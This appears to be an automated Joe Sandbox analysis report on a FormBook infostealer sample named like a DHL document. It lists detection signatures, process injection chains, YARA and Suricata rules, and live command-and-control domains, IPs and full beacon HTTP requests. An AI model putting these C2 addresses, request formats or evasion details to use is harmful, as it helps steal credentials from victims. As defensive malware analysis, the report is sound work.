Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rDHL8350232025-2.exe

Overview

General Information

Sample name:rDHL8350232025-2.exe
Analysis ID:1585371
MD5:6f732c7020a0eba292610a19133b3178
SHA1:f2ea127e9532671903a402a896269f8cd44308ed
SHA256:0fcc36b8e2936fa3fcbc8b618a9033832eb9a833dacd014fc2849c953ac8b7e2
Tags:exeuser-Porcupine
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • rDHL8350232025-2.exe (PID: 5800 cmdline: "C:\Users\user\Desktop\rDHL8350232025-2.exe" MD5: 6F732C7020A0EBA292610A19133B3178)
    • svchost.exe (PID: 1308 cmdline: "C:\Users\user\Desktop\rDHL8350232025-2.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • qSVRmrwLYsrJTsNjTGrEW.exe (PID: 3576 cmdline: "C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 5760 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • qSVRmrwLYsrJTsNjTGrEW.exe (PID: 3724 cmdline: "C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3116 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2148926419.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2148926419.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.4464152837.0000000005210000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4464152837.0000000005210000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x50682:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x39d21:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.4462269594.00000000007E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\rDHL8350232025-2.exe", CommandLine: "C:\Users\user\Desktop\rDHL8350232025-2.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rDHL8350232025-2.exe", ParentImage: C:\Users\user\Desktop\rDHL8350232025-2.exe, ParentProcessId: 5800, ParentProcessName: rDHL8350232025-2.exe, ProcessCommandLine: "C:\Users\user\Desktop\rDHL8350232025-2.exe", ProcessId: 1308, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\rDHL8350232025-2.exe", CommandLine: "C:\Users\user\Desktop\rDHL8350232025-2.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rDHL8350232025-2.exe", ParentImage: C:\Users\user\Desktop\rDHL8350232025-2.exe, ParentProcessId: 5800, ParentProcessName: rDHL8350232025-2.exe, ProcessCommandLine: "C:\Users\user\Desktop\rDHL8350232025-2.exe", ProcessId: 1308, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-07T15:32:24.303849+010020507451Malware Command and Control Activity Detected192.168.2.549736154.215.72.11080TCP
            2025-01-07T15:32:56.245059+010020507451Malware Command and Control Activity Detected192.168.2.549933116.50.37.24480TCP
            2025-01-07T15:34:17.782006+010020507451Malware Command and Control Activity Detected192.168.2.54998485.159.66.9380TCP
            2025-01-07T15:34:31.105080+010020507451Malware Command and Control Activity Detected192.168.2.54998891.195.240.9480TCP
            2025-01-07T15:34:52.926156+010020507451Malware Command and Control Activity Detected192.168.2.54999266.29.149.4680TCP
            2025-01-07T15:35:06.336026+010020507451Malware Command and Control Activity Detected192.168.2.549996195.110.124.13380TCP
            2025-01-07T15:35:35.872835+010020507451Malware Command and Control Activity Detected192.168.2.550000217.196.55.20280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: rDHL8350232025-2.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://www.techchains.info/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.rssnewscast.com/fo8o/?FPJps=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&vVyTz=x4ZDmHH0Avira URL Cloud: Label: malware
            Source: http://www.goldenjade-travel.com/fo8o/?vVyTz=x4ZDmHH0&FPJps=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==Avira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/?vVyTz=x4ZDmHH0&FPJps=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: rDHL8350232025-2.exeReversingLabs: Detection: 52%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2148926419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4464152837.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4462269594.00000000007E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4462305414.0000000003780000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4461185601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2149589488.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2149639363.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4462330271.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: rDHL8350232025-2.exeJoe Sandbox ML: detected
            Source: rDHL8350232025-2.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000000.2074676354.000000000014E000.00000002.00000001.01000000.00000004.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000000.2220851276.000000000014E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: rDHL8350232025-2.exe, 00000000.00000003.2010892583.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, rDHL8350232025-2.exe, 00000000.00000003.2011959448.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2149235070.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2061355887.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2149235070.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2059839826.0000000003200000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2151251292.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4462648577.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2149261496.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4462648577.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: rDHL8350232025-2.exe, 00000000.00000003.2010892583.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, rDHL8350232025-2.exe, 00000000.00000003.2011959448.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2149235070.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2061355887.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2149235070.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2059839826.0000000003200000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.2151251292.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4462648577.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2149261496.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4462648577.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.2117854997.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2149131877.0000000003000000.00000004.00000020.00020000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000003.2087754311.000000000115B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4461436648.000000000068E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4463074784.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2441817012.000000003985C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4461436648.000000000068E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4463074784.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2441817012.000000003985C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.2117854997.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2149131877.0000000003000000.00000004.00000020.00020000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000003.2087754311.000000000115B000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0006C2A2 FindFirstFileExW,0_2_0006C2A2
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000A68EE FindFirstFileW,FindClose,0_2_000A68EE
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_000A698F
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0009D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0009D076
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0009D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0009D3A9
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000A9642
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000A979D
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_000A9B2B
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0009DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0009DBBE
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000A5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_000A5C97
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0046BAB0 FindFirstFileW,FindNextFileW,FindClose,4_2_0046BAB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax4_2_00459480
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi4_2_0045DD45
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h4_2_00A4053E

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49736 -> 154.215.72.110:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49933 -> 116.50.37.244:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49996 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50000 -> 217.196.55.202:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49984 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49988 -> 91.195.240.94:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49992 -> 66.29.149.46:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.joyesi.xyz
            Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
            Source: Joe Sandbox ViewIP Address: 154.215.72.110 154.215.72.110
            Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
            Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000ACE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_000ACE44
            Source: global trafficHTTP traffic detected: GET /fo8o/?vVyTz=x4ZDmHH0&FPJps=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?vVyTz=x4ZDmHH0&FPJps=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?vVyTz=x4ZDmHH0&FPJps=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?FPJps=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&vVyTz=x4ZDmHH0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?FPJps=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hboQSxRfFXXJhWlOcLO2B4JSrf1qenLAzZaPHfWrFdh0bEA==&vVyTz=x4ZDmHH0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?vVyTz=x4ZDmHH0&FPJps=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?FPJps=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&vVyTz=x4ZDmHH0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficDNS traffic detected: DNS query: www.3xfootball.com
            Source: global trafficDNS traffic detected: DNS query: www.kasegitai.tokyo
            Source: global trafficDNS traffic detected: DNS query: www.goldenjade-travel.com
            Source: global trafficDNS traffic detected: DNS query: www.antonio-vivaldi.mobi
            Source: global trafficDNS traffic detected: DNS query: www.magmadokum.com
            Source: global trafficDNS traffic detected: DNS query: www.rssnewscast.com
            Source: global trafficDNS traffic detected: DNS query: www.liangyuen528.com
            Source: global trafficDNS traffic detected: DNS query: www.techchains.info
            Source: global trafficDNS traffic detected: DNS query: www.elettrosistemista.zip
            Source: global trafficDNS traffic detected: DNS query: www.donnavariedades.com
            Source: global trafficDNS traffic detected: DNS query: www.660danm.top
            Source: global trafficDNS traffic detected: DNS query: www.empowermedeco.com
            Source: global trafficDNS traffic detected: DNS query: www.joyesi.xyz
            Source: global trafficDNS traffic detected: DNS query: www.k9vyp11no3.cfd
            Source: global trafficDNS traffic detected: DNS query: www.shenzhoucui.com
            Source: unknownHTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.goldenjade-travel.comOrigin: http://www.goldenjade-travel.comCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 206Referer: http://www.goldenjade-travel.com/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 46 50 4a 70 73 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 2b 79 4d 67 4b 55 66 37 6c 6e 42 53 54 58 45 45 48 35 64 65 51 72 61 55 31 34 63 4a 5a 61 50 52 57 73 55 6b 58 34 3d Data Ascii: 